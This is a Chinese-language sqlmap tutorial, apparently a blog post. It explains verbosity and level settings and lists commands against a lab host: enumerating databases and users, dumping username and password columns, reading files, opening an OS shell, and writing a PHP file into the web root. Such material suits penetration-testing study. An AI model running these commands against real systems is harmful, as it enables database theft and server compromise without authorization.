i sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。
希望这篇文章能让你不仅有一定的收获,而且可以愉快的学习,如果有什么建议,都可以留言和我交流
执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。
ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --dbs

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --current-db

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --current-user

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --is-dba
true 是管理员false 没有权限
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --users

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --tables -D abc

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --columns -T user -D abc

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 =T user -C id,username,password,email --dump

python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --file-read c:\1.txt


python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --os-shell
前提条件my.ini中的secure_file_priv=""要为空
python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --file-write "e:/1.txt" --file-dest "C:/phpstudy/WWW/3.php" -v1


python2 sqlmap.py -u http://10.0.0.130:90/sql.php?id=1 --tamper "base64encode.py" --dbs -v 4
